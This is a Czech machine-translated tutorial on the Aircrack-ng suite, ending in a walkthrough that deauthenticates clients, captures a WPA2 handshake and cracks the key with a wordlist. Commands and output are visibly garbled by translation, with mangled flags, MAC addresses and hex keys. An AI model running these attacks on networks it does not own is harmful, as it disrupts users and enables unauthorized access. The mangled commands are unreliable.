Jak používat Aircrack-ng

How Use Aircrack Ng



Lidé většinou nikdy nepřemýšlejí o síti, ke které jsou připojeni. Nikdy si nemyslí, jak bezpečná ta síť je a jak moc denně riskují svá důvěrná data. Kontrolu zranitelnosti můžete ve svých sítích wifi spouštět pomocí velmi výkonného nástroje s názvem Aircrack-ng a Wireshark. Wireshark slouží k monitorování síťové aktivity. Aircrack-ng je spíše jako agresivní nástroj, který vám umožní hacknout a poskytnout přístup k bezdrátovým připojením. Myšlení jako vetřelec bylo vždy nejbezpečnějším způsobem, jak se chránit před hackerem. Možná budete schopni pochopit přesné akce, které vetřelec podnikne, aby získal přístup k vašemu systému, tím, že se dozví o aircrack. Poté můžete ve svém vlastním systému provádět kontroly souladu, abyste se ujistili, že není nezabezpečený.

Aircrack-ng je úplná sada softwaru navrženého pro testování zabezpečení WiFi sítě. Není to jen jeden nástroj, ale soubor nástrojů, z nichž každý plní určitý účel. Lze pracovat na různých oblastech zabezpečení wifi, jako je monitorování přístupového bodu, testování, útok na síť, prolomení sítě wifi a její testování. Klíčovým cílem společnosti Aircrack je zachytit pakety a dešifrovat hash, aby byla prolomena hesla. Podporuje téměř všechna nová bezdrátová rozhraní. Aircrack-ng je vylepšená verze zastaralé sady nástrojů Aircrack, ng odkazuje na Nová generace . Některé z úžasných nástrojů, které spolupracují při uzavírání větších úkolů.







Airmon:

Airmon-ng je součástí sady aircrack-ng, která uvádí síťovou kartu do režimu monitoru. Síťové karty obvykle přijímají pouze pakety cílené na ně, jak je definováno MAC adresou NIC, ale s airmon-ng budou přijímány také všechny bezdrátové pakety, ať už jsou pro ně cíleny nebo ne. Měli byste být schopni chytit tyto pakety bez propojení nebo ověřování s přístupovým bodem. Slouží ke kontrole stavu přístupového bodu přepnutím síťového rozhraní do režimu monitorování. Nejprve je třeba nakonfigurovat bezdrátové karty tak, aby zapnuly ​​režim monitoru, a poté zabít všechny procesy na pozadí, pokud si myslíte, že jim jakýkoli proces zasahuje. Po ukončení procesů lze režim monitoru na bezdrátovém rozhraní povolit spuštěním následujícího příkazu:



[chráněno e -mailem]: ~ $sudoairmon-ng start wlan0#

Režim monitoru můžete také deaktivovat kdykoli zastavením monitorování pomocí následujícího příkazu:

[chráněno e -mailem]: ~ $sudoairmon-ng stop wlan0#

Airodump:

Airodump-ng slouží k výpisu všech sítí, které nás obklopují, a k zobrazení cenných informací o nich. Základní funkcí airodump-ng je očichávání paketů, takže je v podstatě naprogramováno tak, aby zachytilo všechny pakety kolem nás, zatímco je uvedeno do režimu monitorování. Spustíme to proti všem připojením kolem nás a shromáždíme data, jako je počet klientů připojených k síti, jejich odpovídající mac adresy, styl šifrování a názvy kanálů a poté začneme cílit na naši cílovou síť.

Tento nástroj můžeme aktivovat zadáním příkazu airodump-ng a zadáním názvu síťového rozhraní jako parametru. Zobrazí seznam všech přístupových bodů, množství datových paketů, použité metody šifrování a autentizace a název sítě (ESSID). Z hlediska hackingu jsou nejdůležitějšími adresami adresy mac.

[chráněno e -mailem]: ~ $sudoairodump-ng wlx0mon

Aircrack:

Aircrack slouží k prolomení hesla. Po zachycení všech paketů pomocí airodumpu můžeme klíč prolomit pomocí aircrack. Tyto klíče prolomí pomocí dvou metod PTW a FMS. Přístup PTW se provádí ve dvou fázích. Nejprve se používají pouze pakety ARP a teprve poté, pokud klíč po prolomení není prolomen, použije všechny ostatní zachycené pakety. Plusovým bodem přístupu PTW je, že pro praskání nejsou použity všechny pakety. Ve druhém přístupu, tj. FMS, používáme jak statistické modely, tak algo hrubé síly pro rozlomení klíče. Lze také použít slovníkovou metodu.

Aireplay:

Airplay-ng zavádí pakety do bezdrátové sítě za účelem vytvoření nebo zrychlení provozu. Pakety ze dvou různých zdrojů lze zachytit pomocí aireplay-ng. Prvním je živá síť a druhým pakety z již existujícího souboru pcap. Airplay-ng je užitečný během deautentizačního útoku, který se zaměřuje na bezdrátový přístupový bod a uživatele. Kromě toho můžete provádět několik útoků, jako je útok na kávu latte, pomocí airplay-ng, nástroje, který vám umožní získat klíč ze systému klienta. Toho můžete dosáhnout chycením paketu ARP a následnou manipulací a odesláním zpět do systému. Klient pak vytvoří paket, který lze zachytit pomocí airodumpu a aircrack rozbije klíč z tohoto upraveného paketu. Některé další možnosti útoku airplay-ng zahrnují chopchop, fragment fragmentpreplay atd.

Letecká základna:

Airbase-ng se používá k transformaci počítače vetřelce na kompromitovaný bod připojení, ke kterému se mohou připojit ostatní. Pomocí Airbase-ng můžete tvrdit, že jste legálním přístupovým bodem, a provádět útoky typu man-in-the-middle na počítače, které jsou připojeny k vaší síti. Tyto druhy útoků se nazývají Evil Twin Attacks. Základní uživatelé nemohou rozlišovat mezi legálním přístupovým bodem a falešným přístupovým bodem. Hrozba dvojčat zla je tedy jednou z nejohroženějších bezdrátových hrozeb, se kterými se dnes setkáváme.

Airolib-ng:

Airolib urychluje proces hackování ukládáním a správou seznamů hesel a přístupového bodu. Tento program pro správu databází používá SQLite3, který je většinou k dispozici na všech platformách. Prolomení hesla zahrnuje výpočet párového hlavního klíče, pomocí kterého se extrahuje soukromý přechodný klíč (PTK). Pomocí PTK můžete určit identifikační kód rámcové zprávy (MIC) pro daný paket a teoreticky zjistit, že MIC je podobný paketu, takže pokud měl PTK pravdu, měl pravdu i PMK.

Chcete -li zobrazit seznamy hesel a přístupové sítě uložené v databázi, zadejte následující příkaz:

[chráněno e -mailem]: ~ $sudoairolib-ng testovací databáze-statistiky

Zde testdatabase je db, ke kterému chcete získat přístup nebo jej vytvořit, a –stats je operace, kterou na něm chcete provést. V databázových polích můžete provádět více operací, například dát maximální prioritu nějakému SSID nebo tak něco. Chcete-li použít airolib-ng s aircrack-ng, zadejte následující příkaz:

[chráněno e -mailem]: ~ $sudoaircrack-ng-rtestovací databáze wpa2.eapol.cap

Zde používáme již vypočítané PMK uložené v testovací databáze pro urychlení procesu prolomení hesla.

Prolomení WPA/WPA2 pomocí Aircrack-ng:

Podívejme se na malý příklad toho, co aircrack-ng dokáže s pomocí několika jeho úžasných nástrojů. Předem sdílený klíč sítě WPA/WPA2 prolomíme metodou slovníku.

První věc, kterou musíme udělat, je vypsat síťová rozhraní, která podporují režim monitoru. To lze provést pomocí následujícího příkazu:

[chráněno e -mailem]: ~ $sudoairmon-ng

Čipová sada ovladače rozhraní PHY

Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.

Můžeme vidět rozhraní; nyní musíme přepnout nalezené síťové rozhraní (wlx0) do režimu monitoru pomocí následujícího příkazu:

[chráněno e -mailem]: ~ $sudoairmon-ng start wlx0

Povolil režim monitoru na rozhraní s názvem wlx0mon .

Nyní bychom měli začít poslouchat vysílání blízkých routerů prostřednictvím našeho síťového rozhraní, které jsme přepnuli do režimu monitoru.

[chráněno e -mailem]: ~ $sudoairodump-ng wlx0mon

CH5 ][Uplynulý:30s][ 2020-12-02 00:17



BSSID PWR majáky#Data, #/s CH MB CIPHER ENC AUTH ESSID



E4: 6F:13: 04: CE:31 -Čtyři pět 62 27 0 154e WPA2 CCMP PSK CrackIt

C4: E9:84:76:10:BÝT-63 77 0 0 654e. Hackme WPA2 CCMP PSK

C8: 3A:35: A0: 4E: 01-63 84 0 0 854e WPA2 CCMP PSK Net07

74: DÁVÁ:88: FA:38: 02-68 28 2 0 jedenáct54e WPA2 CCMP PSK TP-Link_3802



Stanice BSSID STATION PWR Sonda ztracených snímků



E4: 6F:13: 04: CE:315C: 3A:Čtyři pět: D7: EA: 8B -3 0- 1e8 5

E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -331e- 6e0 3

E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -35 0-1 0 6

E4: 6F:13: 04: CE:31PŘED NAŠÍM LETOPOČTEM:91: B5: F8: 7E: D5 -390e-1 1002 13

Naše cílová síť je Crackit v tomto případě aktuálně běží na kanálu 1.

Abychom mohli prolomit heslo cílové sítě, musíme zachytit 4směrné podání ruky, ke kterému dochází, když se zařízení pokusí připojit k síti. Můžeme to zachytit pomocí následujícího příkazu:

[chráněno e -mailem]: ~ $sudoairodump-ng-C 1--bssid E4: 6F:13: 04: CE:31 -v /domácí wlx0

-C : Kanál

–Bss : Bssid cílové sítě

-v : Název adresáře, kam bude umístěn soubor pcap

Nyní musíme počkat, až se zařízení připojí k síti, ale existuje lepší způsob, jak zachytit podání ruky. Můžeme deautentifikovat zařízení na AP pomocí deautentizačního útoku pomocí následujícího příkazu:

[chráněno e -mailem]: ~ $sudoaireplay-ng-0 -naE4: 6F:13: 04: CE:31

na : Bssid cílové sítě

-0 : deautentizační útok

Odpojili jsme všechna zařízení a nyní musíme počkat, až se zařízení připojí k síti.

CH1 ][Uplynulý:30s][ 2020-12-02 00:02][WPA handshake: E4: 6F:13: 04: CE:31



Majáky BSSID PWR RXQ#Data, #/s CH MB ŠIFROVÁNÍ ENC AUT. E



E4: 6F:13: 04: CE:31 -47 1 228 807 36 154. WPA2 CCMP PSK P



Stanice BSSID STATION PWR Sonda ztracených snímků



E4: 6F:13: 04: CE:31PŘED NAŠÍM LETOPOČTEM:91: B5: F8: 7E: D5 -35 0-1 0 1

E4: 6F:13: 04: CE:315C: 3A:Čtyři pět: D7: EA: 8B -290e- 1e0 22

E4: 6F:13: 04: CE:31 88:28: B3:30:27: 7E -310e-1 0 32

E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -350e- 6e263 708CrackIt

E4: 6F:13: 04: CE:31D4: 6A: 6A:99: ED: E3 -350e- 0e0 86

E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -37 0- 1e0 1

Dostali jsme zásah, a když se podíváme do pravého horního rohu hned vedle času, vidíme, že bylo zachyceno podání ruky. Nyní se podívejte do zadané složky ( /Domov v našem případě) za a .pcap soubor.

Abychom mohli prolomit klíč WPA, můžeme použít následující příkaz:

[chráněno e -mailem]: ~ $sudoaircrack-ng-a2 -vrockyou.txt-bE4: 6F:13: 04: CE:31handshake.cap

b: Bssid cílové sítě

-a2: režim WPA2

Rockyou.txt: Slovníksouborpoužitý

Handshake.cap: Thesoubor kterýobsahuje zachycené podání ruky

Aircrack-ng1.2beta3

[00:01:49] 10566klíče testovány(1017,96k/s)

KLÍČ NALEZEN! [dostal jsi mě]

Hlavní klíč: 8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B 7B 6D

0C 06 08 ED BC 6B H7 J8 K1 A0896B 7B B F7 6FpadesátkaC


Přechodový klíč: 4D C4 5R 6T76 996G 7H 8D EC

H7 J8 K1 A0896B 7B 6D AF 5B 8D 2D A0896B

A5 BD K1 A0896B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A089

8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B

MAC: CB 5A F8 CE62B2 1B F7 6FpadesátkaC025 62E9 5D71

Klíč k naší cílové síti byl úspěšně prolomen.

Závěr:

Bezdrátové sítě jsou všude, používají je všechny společnosti, od pracovníků používajících chytré telefony až po průmyslová řídicí zařízení. Podle výzkumu bude téměř více než 50 procent internetového provozu přes WiFi v roce 2021. Bezdrátové sítě mají mnoho výhod, komunikace za dveřmi, rychlý přístup k internetu v místech, kde je téměř nemožné položit kabely, může rozšířit síť bez instalace kabelů pro kteréhokoli jiného uživatele a může snadno připojit vaše mobilní zařízení k vašim domácím kancelářím, když tam nejste.

Navzdory těmto výhodám existuje velký otazník ohledně vašeho soukromí a zabezpečení. Protože tyto sítě; ve vysílacím dosahu směrovačů jsou přístupné všem, lze je snadno napadnout a vaše data mohou být snadno ohrožena. Pokud jste například připojeni k nějaké veřejné síti Wi -Fi, kdokoli připojený k této síti může snadno kontrolovat váš síťový provoz pomocí určité inteligence a pomocí úžasných dostupných nástrojů, a dokonce jej vypsat.